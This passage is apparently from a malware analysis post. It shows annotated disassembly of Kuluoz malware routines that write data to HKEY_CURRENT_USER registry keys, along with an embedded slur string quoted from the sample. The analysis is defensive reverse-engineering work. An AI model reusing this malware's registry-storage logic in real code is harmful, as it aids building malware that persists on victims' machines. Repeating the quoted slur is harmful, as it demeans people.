- 0x0D6F1F mov edx, dword ptr [ebp-14h]
- 0x0D6F22 push edx
- 0x0D6F23 call 0x0D1E10h target: 0x0D1E10
- 0x0D6F28 add esp, 14h
- 0x0D6F2B mov eax, dword ptr [ebp+08h]
- 0x0D6F2E push eax
- 0x0D6F2F call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x0D6F35 add esp, 04h
- 0x0D6F38 mov esi, eax
- 0x0D6F3A push 0x0DF064h ASCII "For group!!!!!"
- 0x0D6F3F call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x0D6F45 add esp, 04h
- 0x0D6F48 lea ecx, dword ptr [esi+eax+02h]
- 0x0D6F4C mov dword ptr [ebp-28h], ecx
- 0x0D6F4F lea edx, dword ptr [ebp-10h]
- 0x0D6F52 push edx
- 0x0D6F53 mov eax, dword ptr [ebp-20h]
- 0x0D6F56 push eax
- 0x0D6F57 push 80000001h
- 0x0D6F5C call dword ptr [0x0DE018h] RegCreateKeyA@ADVAPI32.DLL [3 Params]
- 0x0D6F62 test eax, eax
- 0x0D6F64 jne 0x0D6F92h target: 0x0D6F92
- 0x0D6F66 mov ecx, dword ptr [ebp-28h]
- 0x0D6F69 push ecx
- 0x0D6F6A mov edx, dword ptr [ebp-24h]
- 0x0D6F6D push edx
- 0x0D6F6E push 00000003h
- 0x0D6F70 push 00000000h
- 0x0D6F72 mov eax, dword ptr [ebp-1Ch]
- 0x0D6F75 push eax
- 0x0D6F76 mov ecx, dword ptr [ebp-10h]
- 0x0D6F79 push ecx
- 0x0D6F7A call dword ptr [0x0DE01Ch] RegSetValueExA@ADVAPI32.DLL [6 Params]
- 0x0D6F80 test eax, eax
- 0x0D6F82 jne 0x0D6F88h target: 0x0D6F88
- 0x0D6F84 mov byte ptr [ebp-15h], 00000001h
- 0x0D6F88 mov edx, dword ptr [ebp-10h] xref: 0x0D6F82
- 0x0D6F8B push edx
- 0x0D6F8C call dword ptr [0x0DE03Ch] RegCloseKey@ADVAPI32.DLL [1 Params]
- // The typical Kuluoz:
- // "You fag!!!!!" buff :-))
- 0x8D633A push 008DE774h ASCII "Software\"
- 0x8D633F mov edx, dword ptr [ebp-00000230h]
- 0x8D6345 push edx
- [...]
- 0x8D6787 call dword ptr [0x8DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x8D678D mov dword ptr [ebp-08h], eax
- 0x8D6790 push 00001000h
- 0x8D6795 push 00000000h
- 0x8D6797 mov ecx, dword ptr [008E12D8h] 0x00AC0000
- 0x8D679D push ecx
- 0x8D679E call dword ptr [0x8DE0B0h] RtlAllocateHeap@NTDLL.DLL [3 Params]
- 0x8D67A4 mov dword ptr [ebp-10h], eax
- 0x8D67A7 push 0x8DEF44h ASCII "You fag!!!!!"
- 0x8D67AC mov edx, dword ptr [ebp-08h]
- 0x8D67AF push edx
- 0x8D67B0 call dword ptr [008E12D0h] strcpy@NTDLL.DLL [2 Params]
- 0x8D67B6 add esp, 08h
- 0x8D67B9 mov eax, dword ptr [ebp+10h]
- 0x8D67BC push eax
- 0x8D67BD call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x8D67C3 add esp, 04h
- 0x8D67C6 push eax
- 0x8D67C7 mov ecx, dword ptr [ebp+10h]
- 0x8D67CA push ecx
- 0x8D67CB push 0x8DEF54h ASCII "You fag!!!!!"
- 0x8D67D0 call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x8D67D6 add esp, 04h
- 0x8D67D9 add eax, 01h
- 0x8D67DC push eax
- 0x8D67DD mov edx, dword ptr [ebp-10h]
- 0x8D67E0 push edx
- 0x8D67E1 mov eax, dword ptr [ebp-08h]
- 0x8D67E4 push eax
- 0x8D67E5 call 0x8D1E10h target: 0x8D1E10
- 0x8D67EA add esp, 14h
- 0x8D67ED mov ecx, dword ptr [ebp+18h]
- 0x8D67F0 push ecx
- 0x8D67F1 mov edx, dword ptr [ebp+14h]
- 0x8D67F4 push edx
- 0x8D67F5 push 0x8DEF64h ASCII "You fag!!!!!"
- 0x8D67FA call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x8D6800 add esp, 04h
- 0x8D6803 mov ecx, dword ptr [ebp-10h]
- 0x8D6806 lea edx, dword ptr [ecx+eax+01h]
- 0x8D680A push edx
- 0x8D680B call dword ptr [008E12E4h] memcpy@NTDLL.DLL [Unknown Params]
- 0x8D6811 add esp, 0Ch
- 0x8D6814 push 0x8DEF74h ASCII "You fag!!!!!"
- 0x8D6819 call dword ptr [008E12BCh] strlen@NTDLL.DLL [2 Params]
- 0x8D681F add esp, 04h
- 0x8D6822 mov ecx, dword ptr [ebp+18h]
- 0x8D6825 lea edx, dword ptr [ecx+eax+01h]
- 0x8D6829 mov dword ptr [ebp-14h], edx
- 0x8D682C lea eax, dword ptr [ebp-04h]
- 0x8D682F push eax
- 0x8D6830 mov ecx, dword ptr [ebp+08h]
- 0x8D6833 push ecx
- 0x8D6834 push 80000001h
- 0x8D6839 call dword ptr [0x8DE020h] RegOpenKeyA@ADVAPI32.DLL [3 Params]
- 0x8D683F test eax, eax
- 0x8D6841 jne 0x8D686Fh target: 0x8D686F
- 0x8D6843 mov edx, dword ptr [ebp-14h]
- 0x8D6846 push edx
- 0x8D6847 mov eax, dword ptr [ebp-10h]
- 0x8D684A push eax
- 0x8D684B push 00000003h
- 0x8D684D push 00000000h
- 0x8D684F mov ecx, dword ptr [ebp+0Ch]
- 0x8D6852 push ecx
- 0x8D6853 mov edx, dword ptr [ebp-04h]
- 0x8D6856 push edx
- 0x8D6857 call dword ptr [0x8DE01Ch] RegSetValueExA@ADVAPI32.DLL [6 Params]
- 0x8D685D test eax, eax
- 0x8D685F jne 0x8D6865h target: 0x8D6865
- 0x8D6861 mov byte ptr [ebp-09h], 00000001h
- 0x8D6865 mov eax, dword ptr [ebp-04h] xref: 0x8D685F
- 0x8D6868 push eax
- 0x8D6869 call dword ptr [0x8DE03Ch] RegCloseKey@ADVAPI32.DLL [1 Params]
- # To be added, maybe..
- ---
- #MalwareMustDie!!